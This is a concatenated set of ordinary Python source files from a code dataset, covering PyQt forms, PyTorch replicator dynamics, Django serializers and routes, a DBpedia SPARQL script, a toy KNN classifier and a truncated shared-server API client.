self.t_entry.setObjectName(\"t_entry\")\n\n self.t_sex = QtWidgets.QTextEdit(Form)\n self.t_sex.setGeometry(QtCore.QRect(590, 73, 107, 31))\n self.t_sex.setObjectName(\"t_sex\")\n\n self.t_bir = QtWidgets.QTextEdit(Form)\n self.t_bir.setGeometry(QtCore.QRect(110, 133, 121, 31))\n self.t_bir.setObjectName(\"t_bir\")\n\n self.skills = QtWidgets.QLabel(Form)\n self.skills.setGeometry(QtCore.QRect(30, 423, 141, 31))\n self.skills.setObjectName(\"skills\")\n\n self.nation = QtWidgets.QLabel(Form)\n self.nation.setGeometry(QtCore.QRect(270, 133, 51, 31))\n self.nation.setObjectName(\"nation\")\n\n self.t_marriage = QtWidgets.QTextEdit(Form)\n self.t_marriage.setGeometry(QtCore.QRect(350, 193, 107, 31))\n self.t_marriage.setObjectName(\"t_marriage\")\n\n self.marriage = QtWidgets.QLabel(Form)\n self.marriage.setGeometry(QtCore.QRect(270, 193, 81, 31))\n self.marriage.setObjectName(\"marriage\")\n\n self.depid = QtWidgets.QLabel(Form)\n self.depid.setGeometry(QtCore.QRect(30, 253, 71, 31))\n self.depid.setObjectName(\"depid\")\n\n self.id = QtWidgets.QLabel(Form)\n self.id.setGeometry(QtCore.QRect(30, 73, 71, 31))\n self.id.setObjectName(\"id\")\n\n self.t_name = QtWidgets.QTextEdit(Form)\n self.t_name.setGeometry(QtCore.QRect(350, 73, 107, 31))\n self.t_name.setObjectName(\"t_name\")\n\n self.edu = QtWidgets.QLabel(Form)\n self.edu.setGeometry(QtCore.QRect(30, 193, 61, 31))\n self.edu.setObjectName(\"edu\")\n\n self.t_depid = QtWidgets.QTextEdit(Form)\n self.t_depid.setGeometry(QtCore.QRect(110, 253, 121, 31))\n self.t_depid.setObjectName(\"t_depid\")\n\n self.t_salary = QtWidgets.QTextEdit(Form)\n self.t_salary.setGeometry(QtCore.QRect(350, 313, 107, 31))\n self.t_salary.setObjectName(\"t_salary\")\n\n self.politics = QtWidgets.QLabel(Form)\n self.politics.setGeometry(QtCore.QRect(510, 133, 81, 31))\n self.politics.setObjectName(\"politics\")\n\n self.tel = QtWidgets.QLabel(Form)\n self.tel.setGeometry(QtCore.QRect(510, 253, 61, 31))\n self.tel.setObjectName(\"tel\")\n\n self.name = QtWidgets.QLabel(Form)\n self.name.setGeometry(QtCore.QRect(270, 73, 61, 31))\n self.name.setObjectName(\"name\")\n\n self.duty = QtWidgets.QLabel(Form)\n self.duty.setGeometry(QtCore.QRect(270, 253, 61, 31))\n self.duty.setObjectName(\"duty\")\n\n self.t_id = QtWidgets.QTextEdit(Form)\n self.t_id.setGeometry(QtCore.QRect(110, 73, 121, 31))\n self.t_id.setObjectName(\"t_id\")\n\n self.sex = QtWidgets.QLabel(Form)\n self.sex.setGeometry(QtCore.QRect(510, 73, 51, 31))\n self.sex.setObjectName(\"sex\")\n\n self.t_edu = QtWidgets.QTextEdit(Form)\n self.t_edu.setGeometry(QtCore.QRect(110, 193, 121, 31))\n self.t_edu.setObjectName(\"t_edu\")\n\n self.t_mail = QtWidgets.QTextEdit(Form)\n self.t_mail.setGeometry(QtCore.QRect(590, 313, 135, 31))\n self.t_mail.setObjectName(\"t_mail\")\n\n self.t_politics = QtWidgets.QTextEdit(Form)\n self.t_politics.setGeometry(QtCore.QRect(590, 133, 107, 31))\n self.t_politics.setObjectName(\"t_politics\")\n\n self.t_rank = QtWidgets.QTextEdit(Form)\n self.t_rank.setGeometry(QtCore.QRect(110, 313, 121, 31))\n self.t_rank.setObjectName(\"t_rank\")\n\n self.retranslateUi(Form)\n self.modify.clicked.connect(Form.save_to_database)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"修改员工信息\"))\n self.mail.setText(_translate(\"Form\", \"邮箱\"))\n self.dep.setText(_translate(\"Form\", \"部门\"))\n self.title.setText(_translate(\"Form\", \"

修改员工信息

\"))\n self.salary.setText(_translate(\"Form\", \"工资\"))\n self.modify.setText(_translate(\"Form\", \"保存修改\"))\n self.bir.setText(_translate(\"Form\", \"出生日期\"))\n self.entry.setText(_translate(\"Form\", \"入职日期\"))\n self.rank.setText(_translate(\"Form\", \"级别\"))\n self.skills.setText(_translate(\"Form\", \"工作经验及技能\"))\n self.nation.setText(_translate(\"Form\", \"民族\"))\n self.marriage.setText(_translate(\"Form\", \"婚姻状况\"))\n self.depid.setText(_translate(\"Form\", \"部门ID\"))\n self.id.setText(_translate(\"Form\", \"员工Id\"))\n self.edu.setText(_translate(\"Form\", \"学历\"))\n self.politics.setText(_translate(\"Form\", \"政治面貌\"))\n self.tel.setText(_translate(\"Form\", \"手机\"))\n self.name.setText(_translate(\"Form\", \"姓名\"))\n self.duty.setText(_translate(\"Form\", \"职务\"))\n self.sex.setText(_translate(\"Form\", \"性别\"))\n\n\n\nif __name__ == \"__main__\":\n \n app = QtWidgets.QApplication(sys.argv)\n app.setWindowIcon(QIcon(\"./source/staff.png\"))\n app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n Form = QtWidgets.QWidget()\n ui = staff_modify_ui()\n ui.setupUi(Form)\n Form.show()\n sys.exit(app.exec_())\n","sub_path":"source/staff_modify_ui.py","file_name":"staff_modify_ui.py","file_ext":"py","file_size_in_byte":7671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"579087345","text":"\nimport torch\nimport warnings\n\n# import logging\n# logger = logging.getLogger('logger')\n# logger.warning('prova')\n\n__all__ = ['dynamics']\n\n\ndef dynamics(W, X, tol=1e-6, max_iter=5, mode='replicator', **kwargs):\n \"\"\"\n Selector for dynamics\n Input:\n W: the pairwise nxn similarity matrix (with zero diagonal)\n X: an (n,m)-array whose rows reside in the n-dimensional simplex. If\n an (n,)-array is provided, it must reside in the n-dimensional simplex\n tol: error tolerance\n max_iter: maximum number of iterations\n mode: 'replicator' to run classical replicator dynamics,\n 'exponential' to run exponential replicator dynamics.\n 'inf_imm' to run infection-immunization dynamics (not implemented).\n \"\"\"\n\n if mode == 'replicator':\n X = _replicator(W, X, tol, max_iter)\n elif mode == 'exponential':\n X = _exponential(W, X, tol, max_iter, kwargs.get('k', 1.))\n elif mode == 'inf_imm':\n if X.dim == 2:\n raise ValueError('Currently, only one-dimensional vectors are '\n 'accepted with \\'inf_imm\\' mode')\n X = _inf_imm(W, X, tol, max_iter)\n else:\n raise ValueError('mode \\'' + mode + '\\' is not defined.')\n\n return X\n\n\ndef _replicator(W, X, tol, max_iter):\n \"\"\"\n Replicator Dynamics\n Output:\n X: the population(s) at convergence\n i: the number of iterations needed to converge\n prec: the precision reached by the dynamical system\n \"\"\"\n\n i = 0\n while i < max_iter:\n X = X * torch.matmul(W, X)\n # z = X.register_hook(lambda g: print(g))\n # print(z)\n X /= X.sum(dim=X.dim() - 1).unsqueeze(X.dim() - 1)+1e-12 # dirty fix for division of zero error creating Nan\n # z = X.register_hook(lambda g: print(g))\n # print(z)\n\n i += 1\n\n return X\n\n\ndef _exponential(W, X, tol, max_iter, k):\n \"\"\"\n Exponential Replicator Dynamics\n Input:\n k: the \"acceleration\" parameter of the dynamical system\n Output:\n x: the population(s) at convergence\n iter: the number of iterations needed to converge\n prec: the precision reached by the dynamical system\n \"\"\"\n\n err = 2. * tol\n i = 0\n while err > tol and i < max_iter:\n X_old = X\n X = X * torch.exp(k * (torch.matmul(W, X) - 1.)) # softmax trick\n X /= X.sum(dim=X.dim() - 1).unsqueeze(X.dim() - 1)\n\n err = torch.norm(X - X_old)\n i += 1\n\n if i == max_iter:\n warnings.warn(\"Maximum number of iterations reached.\")\n\n return X\n\n\ndef _inf_imm(W, X, tol, max_iter):\n \"\"\"\n Infection Immunization Dynamics\n Output:\n x: the population(s) at convergence\n iter: the number of iterations needed to converge\n prec: the precision reached by the dynamical system\n \"\"\"\n dtype = X.dtype # casting dtype for ByteTensors\n\n WX = torch.matmul(W, X)\n XWX = torch.matmul(WX, X)\n r = WX - XWX\n\n # TODO: check Nash error\n err = (torch.max(X, r) ** 2.).sum()\n i = 0\n\n while err > tol and i < max_iter:\n max_, imax = torch.max(r, dim=0)\n min_, imin = torch.min(r * (X > 0.).to(dtype), dim=0) # TODO: check\n infective = imax if max_ > -min_ else imin\n den = W[infective, infective] - WX[infective] - r[infective]\n\n do_remove = False\n if r[infective] >= 0.:\n mu = 1.\n if den < 0:\n opt_delta = -r[infective] / den\n if opt_delta < mu:\n mu = opt_delta\n # if mu < 0.: mu = 0.\n else:\n do_remove = True\n mu = X[infective] / (X[infective] - 1.)\n if den < 0.:\n opt_delta = -r[infective] / den\n if opt_delta >= mu:\n mu = opt_delta\n do_remove = False\n\n n = X.shape[0]\n X = mu * ((torch.arange(n, device=X.device) == infective).to(\n dtype) - X) + X\n\n if do_remove:\n X[infective] = 0.\n\n WX = mu * (W[infective, :] - WX) + WX\n\n XWX = torch.matmul(X, WX)\n r = WX - XWX\n\n err = (torch.max(X, r) ** 2.).sum()\n i += 1\n\n if i == max_iter:\n warnings.warn(\"Maximum number of iterations reached.\")\n\n return X","sub_path":"dynamics.py","file_name":"dynamics.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"387846136","text":"import unittest\nimport time\n\nfrom sqlalchemy import exists\nfrom sqlalchemy_utils.functions import drop_database\n\nfrom src.database import init_db, engine, session\nfrom src.models import Game, Player\n\nfrom src.tests.question_tests import add_questions, questions\nfrom src.tests.player_test import players, add_players\n\n\ndef add_players_to_game(game):\n for p in players:\n game.players.append(p)\n session.commit()\n\n\nclass TestGame(unittest.TestCase):\n def setUp(self):\n init_db()\n self.create_game()\n\n def tearDown(self):\n drop_database(engine.url)\n session.commit()\n\n def create_game(self):\n self.game_name = \"Skindustries 16 mei 2016\"\n\n self.g = Game(self.game_name)\n self.g.save()\n\n def test_create_game(self):\n \"\"\"\n Test if a game can be created using a name\n \"\"\"\n game_name = \"Skindustries 9 mei 2016\"\n g = Game(game_name)\n save = g.save()\n\n assert session.query(exists().where(\n Game.name == game_name)).scalar() == True\n assert save is True\n\n def test_duplicate_game_name(self):\n \"\"\"\n Assert if a duplicate game name is caught and returns False\n \"\"\"\n game_name = \"Skindustries 16 mei 2016\"\n g = Game(game_name)\n save = g.save()\n assert save is False\n\n def test_get_random_question(self):\n add_questions()\n question_ids = []\n for i in range(len(questions)):\n question = self.g.get_random_question()\n assert question.question_id not in question_ids\n question_ids.append(question.question_id)\n\n def test_add_player(self):\n player_name = \"Neal\"\n player = Player(player_name)\n self.g.add_player(player)\n\n query = session.query(Game)\n g = query.filter(Game.game_id == self.g.game_id).first()\n\n assert g.players[0].name == player_name\n\n def test_add_multiple_players(self):\n player_1_name = \"Neal\"\n player_2_name = \"Kittie\"\n player_3_name = \"Desmond\"\n\n player_1 = Player(player_1_name)\n player_2 = Player(player_2_name)\n player_3 = Player(player_3_name)\n\n self.g.add_player(player_1)\n self.g.add_player(player_2)\n self.g.add_player(player_3)\n\n query = session.query(Game)\n g = query.filter(Game.game_id == self.g.game_id).first()\n\n assert len(g.players) > 1\n\n def test_reset_questions(self):\n add_questions()\n for i in range(len(questions)):\n self.g.get_random_question()\n\n assert len(self.g.questions) > 0\n\n self.g.reset_questions()\n assert len(self.g.questions) == 0\n\n def test_next_round(self):\n assert self.g.round == 1\n self.g.next_round()\n assert self.g.round == 2\n\n def test_start_player(self):\n add_players_to_game(self.g)\n\n for i in range(10):\n time.sleep(3)\n p = self.g.select_start_player()\n print(p)\n\n def test_increase_score(self):\n for i in range(20):\n self.g.increase_score()\n print(self.g.current_score)\n print(self.g.total_score)\n","sub_path":"kivy_version/src/tests/game_tests.py","file_name":"game_tests.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576733523","text":"#3052번_나머지\n\nn_list = [int(input()) for i in range(0,10)]\nck_list = []\n\nfor i in n_list:\n ck_list.append(i%42)\n\nmy_set = set(ck_list)\nnew_list = list(my_set)\nprint(len(new_list))\n","sub_path":"05_일차원배열/[04]3052번_나머지.py","file_name":"[04]3052번_나머지.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88297833","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls.defaults import *\nfrom ragendja.urlsauto import urlpatterns\nfrom ragendja.auth.urls import urlpatterns as auth_patterns\nfrom myapp.forms import UserRegistrationForm\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nhandler500 = 'ragendja.views.server_error'\n\nurlpatterns = auth_patterns + patterns('',\n ('^admin/(.*)', admin.site.root),\n (r'^$', 'django.views.generic.simple.direct_to_template',\n {'template': 'main.html'}),\n # Override the default registration form\n url(r'^account/register/$', 'registration.views.register',\n kwargs={'form_class': UserRegistrationForm},\n name='registration_register'),\n url(r'^_ah/queue/deferred', 'myapp.views.ah_queue_deferred', name='ah_queue_deferred'),\n url(r'^_ah/warmup', 'myapp.views.ah_warmup', name='ah_warmup'),\n url(r'^_ah/start', 'myapp.views.ah_start', name='ah_start'),\n url(r'^_ah/stop', 'myapp.views.ah_stop', name='ah_stop'),\n) + urlpatterns\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195534837","text":"# coding: utf-8\n\ndesc={\"ref\": {\"H2\": \"https://www.britannica.com/science/hydrogen\"},\n \"brief\": \"Hydrogen molecule.\",\n \"usage\": \"No options available.\"\n }\n\nimport numpy as np\n\nsites = np.array([[0,0,-0.037],\n [0,0,+0.037]]) # nm, HH\n\nlabels = [\"H\",\"H\"]\nname = \"H2\"\n","sub_path":"genice/molecules/H2.py","file_name":"H2.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"451808650","text":"# --- imports ---\nfrom pprint import pprint\nimport re\nfrom SPARQLWrapper import SPARQLWrapper, JSON\nsparql = SPARQLWrapper(\"http://dbpedia.org/sparql\")\nsparql.setTimeout(100)\nsparql.query()\nsparql.addDefaultGraph(\"http://dbpedia.org\")\n\n# --- constants ---\nVERBOSE=False\n\n# ontology\nSPARQ_AUTHOR_NAME = \"\"\"\n PREFIX rdf: \n PREFIX dbp: \n SELECT ?person\n WHERE {{\n ?person a dbp:Person .\n ?person foaf:name ?name\n FILTER ((LANG(?name)=\"en\" or LANG(?name)=\"fr\") and CONTAINS(?name, \"{}\")).\n }}\n LIMIT 10\n\"\"\"\nSPARQ_MOVEMENTS = \"\"\"\n PREFIX rdf: \n PREFIX dbp: \n PREFIX dct: \n SELECT ?genre ?genre_name\n WHERE {{\n <{}> dbp:genre ?genre .\n ?genre dct:subject dbc:Literary_movements .\n ?genre rdfs:label ?genre_name .\n FILTER (LANG(?genre_name)=\"fr\")\n }}\n LIMIT 10\n\"\"\"\nSPARQ_MOVEMENTS = \"\"\"\n PREFIX rdf: \n PREFIX dbp: \n PREFIX dct: \n SELECT ?genre ?genre_name\n WHERE {{\n <{}> ?genre .\n ?genre rdfs:label ?genre_name .\n FILTER (LANG(?genre_name)=\"fr\")\n }}\n LIMIT 10\n\"\"\"\n\n# --- code ---\ndef get_uri_from_name(author_name, verbose=VERBOSE):\n query = SPARQ_AUTHOR_NAME.format(author_name)\n sparql.setQuery(query)\n sparql.setReturnFormat(JSON)\n if verbose: print(\"Query:\\n{}\".format(query))\n \n results = sparql.query().convert()\n \n if len(results['results']['bindings']) > 0: # if the querry did yield results, return the first one\n author_uri = results['results']['bindings'][0]['person']['value']\n if verbose: print(\"\\nResult: '{}'\".format(author_uri))\n \n else: # if the querry didn't yield any result, return None\n author_uri = None\n if verbose: print(\"\\nNo result\")\n \n return author_uri\n\ndef get_author_uri(author_name, verbose=VERBOSE):\n if verbose: print(\"Raw name: {}\".format(author_name))\n \n # three kind of names (in each case, can be followed by years):\n # - family name, initials (given name)\n # - family name, given name\n # - full name\n re_family_given_parenthesis_date = r'([^,]+), (?:(.+) )?\\(([^,]+)\\)(, ?[-\\d\\?]+)?'\n re_family_given_date = r'([^,]+), (?:([^,]+))(, ?[-\\d\\?]+)?'\n re_date = r'(, ?[-\\d\\?]+)?'\n \n author_uri = None\n \n # try to match \"family name, initials (given name)\"\n match = re.match(re_family_given_parenthesis_date, author_name)\n if match:\n family_name, initials, given_name = match.group(1, 2, 3)\n if verbose: print(\"Given name: {}\\n\"\n \"Initials: {}\\n\"\n \"Family name: {}\".format(given_name, initials, family_name))\n \n # query with given and family names, and with initials and family name if it fails\n author_uri = (get_uri_from_name(given_name + ' ' + family_name, verbose=verbose) or\n get_uri_from_name(initials + ' ' + family_name, verbose=verbose))\n \n # try to match \"family name, given name\"\n match = re.match(re_family_given_date, author_name)\n if match and not author_uri:\n family_name, given_name = match.group(1, 2)\n if verbose: print(\"Given name: {}\\n\"\n \"Family name: {}\".format(given_name, family_name))\n \n # query with given and family names\n author_uri = get_uri_from_name(given_name + ' ' + family_name, verbose=verbose)\n \n # if nothing else yielded result, we just remove the years at the end of the name\n if not author_uri:\n name = re.sub(re_date, '', author_name)\n if verbose: print(\"Full name: {}\".format(name))\n \n # query with full name\n author_uri = get_uri_from_name(name, verbose=verbose)\n \n return author_uri\n\ndef get_movements(author_uri, verbose=VERBOSE):\n query = SPARQ_MOVEMENTS.format(author_uri)\n sparql.setQuery(query)\n sparql.setReturnFormat(JSON)\n #if verbose: print(\"Query:\\n{}\".format(query))\n \n results = sparql.query().convert()\n \n # create a dictionary of languages and the corresponding abstract\n movements = dict()\n for result in results['results']['bindings']:\n movements[result['genre']['value']] = result['genre_name']['value']\n \n if verbose: print(\"Movements\"); pprint(movements)\n \n return movements\n\ndef get_movements_from_name(author_name, verbose=VERBOSE):\n author_uri = get_author_uri(author, verbose=verbose)\n \n if author_uri:\n if verbose: print(author, \"found:\", author_uri)\n\n movements = get_movements(author_uri, verbose=verbose)\n \n return author_uri, movements\n \n else:\n if verbose: print(f\"'{author}' not found among the authors\")\n return None, None\n\n# --- main ---\nif __name__ == \"__main__\":\n test = {\n 'Aaron, S. F. (Samuel Francis), 1862-': {\n \"Radio Boys Cronies\\rOr, Bill Brown's Radio\": '/ebooks/11861',\n 'Radio Boys Loyalty; Or, Bill Brown Listens In': '/ebooks/25753'},\n 'Abbott, Charles C. (Charles Conrad), 1843-1919': {'Outings at Odd Times': '/ebooks/48916',\n 'Travels in a Tree-top': '/ebooks/55805'},\n 'Abbott, Edwin Abbott, 1838-1926': {'Flatland: A Romance of Many Dimensions': '/ebooks/45506',\n 'Flatland: A Romance of Many Dimensions (Illustrated)': '/ebooks/201',\n 'How to Write Clearly: Rules and Exercises on English Composition': '/ebooks/22600',\n 'Onesimus: Memoirs of a Disciple of St. Paul': '/ebooks/54223',\n 'Philochristus: Memoirs of a Disciple of the Lord': '/ebooks/48843',\n 'Silanus the Christian': '/ebooks/56843'},\n 'Abbott, Eleanor Hallowell, 1872-1958': {'Fairy Prince and Other Stories': '/ebooks/26399',\n 'The Indiscreet Letter': '/ebooks/15728',\n 'Little Eve Edgarton': '/ebooks/15660',\n 'Molly Make-Believe': '/ebooks/18665',\n 'Old-Dad': '/ebooks/48990',\n 'Peace on Earth, Good-will to Dogs': '/ebooks/20213',\n 'Rainy Week': '/ebooks/43025',\n \"The Sick-a-Bed LadyAnd Also Hickory Dock, The Very Tired Girl, The Happy-Day, Something That Happened in October, The Amateur Lover, Heart of The City, The Pink Sash, Woman's Only Business\": '/ebooks/34829',\n 'The Stingy Receiver': '/ebooks/49330',\n 'The White Linen Nurse': '/ebooks/14506'},\n 'Guy de Maupassant':{}}\n\n for author in test.keys():\n print(get_movements_from_name(author))","sub_path":"experiments/author_movement.py","file_name":"author_movement.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"615098094","text":"from rest_framework import serializers\nfrom . models import Pizza,Topping,Size,Type\n\nclass ToppingSerializer(serializers.ModelSerializer):\n class Meta:\n model=Topping \n fields=('name',)\nclass SizeSerializer(serializers.ModelSerializer):\n class Meta:\n model=Size \n fields=('val',)\nclass TypeSerializer(serializers.ModelSerializer):\n class Meta:\n model=Type \n fields=('name',)\nclass PizzaSerializer(serializers.ModelSerializer):\n toppings=ToppingSerializer(many=True)\n sizes=SizeSerializer(many=True)\n types=TypeSerializer(many=True)\n class Meta:\n model=Pizza\n fields=('id','name','toppings','sizes','types')\n def create(self, validated_data):\n temp_topping = validated_data.pop('toppings')\n temp_size = validated_data.pop('sizes')\n temp_types = validated_data.pop('types')\n topping,size,types=[],[],[]\n for i in temp_topping:\n if(i in topping):continue\n topping.append(i)\n for i in temp_size:\n if(i in size):continue\n size.append(i)\n for i in temp_types:\n if(i in types):continue\n types.append(i)\n piza = Pizza.objects.create(**validated_data)\n for i in topping:\n val=dict(i)\n try:\n v=Topping.objects.get(name=val['name'])\n piza.toppings.add(v)\n except:\n piza.toppings.add(Topping.objects.create(**val))\n for i in size:\n val=dict(i)\n try:\n v=Size.objects.get(val=val['val'])\n piza.sizes.add(v)\n except:\n one=Size.objects.create(**val)\n piza.sizes.add(one)\n for i in types:\n val=dict(i)\n try:\n v=Type.objects.get(name=val['name'])\n piza.types.add(v)\n except:\n piza.types.add(Type.objects.create(**val))\n return piza\n def update(self, instance, validated_data):\n if(validated_data['name']!=''):\n instance.name=validated_data.get('name',instance)\n if(validated_data['toppings']!=[]):\n for i in validated_data.get('toppings',instance.toppings):\n try:\n if(instance.toppings.get(name=f\"{i['name']}\")):\n continue\n except:\n store=Topping.objects.create(**dict(i))\n instance.toppings.add(store)\n if(validated_data['sizes']!=[]):\n for i in validated_data.get('sizes',instance.sizes):\n\n try:\n if(instance.sizes.get(val=f\"{i['val']}\")):\n continue\n except:\n store=Size.objects.create(**dict(i))\n instance.sizes.add(store)\n if(validated_data['types']!=[]):\n val=dict(validated_data.get('types')[0])\n if(len(instance.types.all())!=0):\n instance.types.all()[0].delete()\n if(val['name']=='Square'):\n store=Type.objects.create(name='Square')\n instance.types.add(store)\n elif(val['name']=='Regular'):\n store=Type.objects.create(name='Regular')\n instance.types.add(store)\n instance.save()\n return instance","sub_path":"Django/Pizza/Pizproj/pizzaapp/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"509357628","text":"#!/usr/bin/env python3\nfrom scipy.spatial import distance\n\ndef euc(a,b):\n\treturn distance.euclidean(a,b)\n\nclass ScrappyKNN():\n\tdef fit(self, X_train, y_train):\n\t\tself.X_train = X_train\n\t\tself.y_train = y_train\n\tdef predict(self, X_test):\n\t\tpredictions = []\n\t\tfor row in X_test:\n\t\t\tlabel = self.closest(row)\n\t\t\tpredictions.append(label)\n\t\treturn predictions\n\tdef closest(self, row):\n\t\tbest = euc(row, self.X_train[0])\n\t\tbest_index = 0\n\t\tfor i in range(1,len(self.X_train)):\n\t\t\tdist = euc(self.X_train[i],row)\n\t\t\tif dist < best:\n\t\t\t\tbest = dist\n\t\t\t\tbest_index = i\n\t\treturn self.y_train[best_index]\n\n# Writing a classifier \n\n# import dataset\t\nfrom sklearn import datasets\niris = datasets.load_iris()\n\n# x is features, y is label\nX = iris.data\ny = iris.target\n\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = .5)\n\n# Decision tree classifier\n#from sklearn import tree\n#my_classifier = tree.DecisionTreeClassifier()\n# KNeighbors Classifier\n#from sklearn.neighbors import KNeighborsClassifier\n#my_classifier = KNeighborsClassifier()\nmy_classifier = ScrappyKNN()\n\n\nmy_classifier.fit(X_train, y_train)\n\n\nfrom sklearn.metrics import accuracy_score\nfor i in range(3):\n\tpredictions = my_classifier.predict(X_test)\n\tprint(accuracy_score(y_test, predictions))\n","sub_path":"src/python/ml/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"529707777","text":"\"\"\"\nDemo shell\n\"\"\"\n\nfrom cmd import Cmd\n\nfrom txtai.embeddings import Embeddings\n\n\nclass Shell(Cmd):\n \"\"\"\n Query shell.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.intro = \"query shell\"\n self.prompt = \"(search) \"\n\n self.embeddings = None\n self.data = None\n\n def preloop(self):\n # Create embeddings model, backed by sentence-transformers & transformers\n self.embeddings = Embeddings({\"path\": \"sentence-transformers/nli-mpnet-base-v2\"})\n\n self.data = [\n \"US tops 5 million confirmed virus cases\",\n \"Canada's last fully intact ice shelf has suddenly collapsed, forming a Manhattan-sized iceberg\",\n \"Beijing mobilises invasion craft along coast as Taiwan tensions escalate\",\n \"The National Park Service warns against sacrificing slower friends in a bear attack\",\n \"Maine man wins $1M from $25 lottery ticket\",\n \"Make huge profits without work, earn up to $100,000 a day\",\n ]\n\n def default(self, line):\n # Get index of best section that best matches query\n uid = self.embeddings.similarity(line, self.data)[0][0]\n print(self.data[uid])\n print()\n\n\ndef main():\n \"\"\"\n Shell execution loop.\n \"\"\"\n\n Shell().cmdloop()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"examples/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"453618282","text":"#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport sys, getopt, re, numpy\n\n#infile=\"/home/dwragg/Documents/eQTL/test.XPEHH\"\n#outfile=\"/home/dwragg/Documents/eQTL/test-filtered.XPEHH\"\n#rate=0.9\n\ndef main(argv):\n infile = ''\n outfile = ''\n rate = 0.9\n try:\n opts, args = getopt.getopt(argv,\"hi:o:r:\",[\"infile=\",\"outfile=\", \"rate=0.9\"])\n except getopt.GetoptError:\n print('vcf-reannotate.py -v -o -n -p ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('filter-XPEHH.py -i -o -r ')\n sys.exit()\n elif opt in (\"-i\", \"--infile\"):\n infile = arg\n elif opt in (\"-o\", \"--outfile\"):\n outfile = arg\n elif opt in (\"-r\", \"--rate\"):\n rate = float(arg)\n print('XPEHH file to read is \"', infile)\n print('XPEHH file to output is \"', outfile)\n print('Call rate is \"', rate)\n\n\n # Open files for writing and reading\n fout=open(outfile, \"w\")\n fin=open(infile)\n\n i =\t0\n for line in fin:\n i\t= i +1\n if(i==1):\n \tfout.write(line)\n else:\n \t# Calcualte call rate\n call = 1 - ((len(re.findall(\"NA\", line))) / (len(line.rstrip(\"\\n\").split(\" \"))-1))\n if(call >= rate): \n # Set NA values to median\n data = line.split(\" \")\n xpehh = [ x for x in data[1:] if \"NA\" not in x ]\n xpehh_median = numpy.median(numpy.array(xpehh, dtype=float))\n updated = line.replace(\"NA\", str(xpehh_median))\n #fout.write(str(call) + \"\\t\" + updated)\n fout.write(updated)\n \n\n fin.close()\n fout.close()\n \n \n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n \n \n \n","sub_path":"filterXPEHH.py","file_name":"filterXPEHH.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"331513157","text":"\"\"\"@package ServerRequest\nImplements API methods that allow user related\ntransactions and requests to be sent to the Shared\nServer.\n\"\"\"\nimport os\nimport json\nimport requests\nimport logging as logger\nimport config.constants as constants\nfrom src.main.resources.Server import ServerTokenUpdater\n\nSS_URI = \"http://127.0.0.1:5005/api\"\nif not \"SS_URL\" in os.environ:\n\tos.environ[\"SS_URL\"] = SS_URI\n\nDEFAULT_APP_TOKEN = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwianRpIjoiZmNlNzljZWItOTIyYi00NTljLWE1OTQtNjZkZDAxMTQxNTU2IiwiZXhwIjoxNTEyMzY0MTY0LCJpYXQiOjE1MTE5MzI1MDR9.MDLKAxH-NAlErjDEigg-vr_8ijv-sJgQ1NhimMGtCPY'\n\nif not \"APP_TOKEN\" in os.environ:\n\tos.environ[\"APP_TOKEN\"] = DEFAULT_APP_TOKEN\n\nQUERY_TOKEN = \"?token=\"\nCARS_END = \"/cars\"\nUSER_END = os.environ[\"SS_URL\"] + \"/users\"\nTRANSACT_END = \"/transactions\"\nTRIPS_END = \"/trips\"\nSERVER_END = \"/server\"\nPAYMETHODS_END = \"/paymethods\"\n\nheaders = {'Content-Type' : 'application/json'}\nMAX_ATTEMPTS = 10\n\n\"\"\"Returns a list of all the users and their information in json format.\"\"\"\n@ServerTokenUpdater()\ndef getUsers():\n\tr = requests.get(USER_END + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\tif (r.status_code != constants.SUCCESS):\n\t\tlogger.getLogger(\"Shared Server returned error: %d\"%(r.status_code))\n\t\traise Exception(\"Shared Server returned error: %d\"%(r.status_code))\n\treturn (r.status_code, r.json()[\"users\"])\n\n\n\"\"\"Receives a user id. Returns the information of the user that matches that id in json format.\n\"\"\"\n@ServerTokenUpdater()\ndef getUser(userId):\n\tr = requests.get(USER_END + \"/\" + str(userId) + QUERY_TOKEN + os.environ[\"APP_TOKEN\"], headers=headers)\n\n\tif 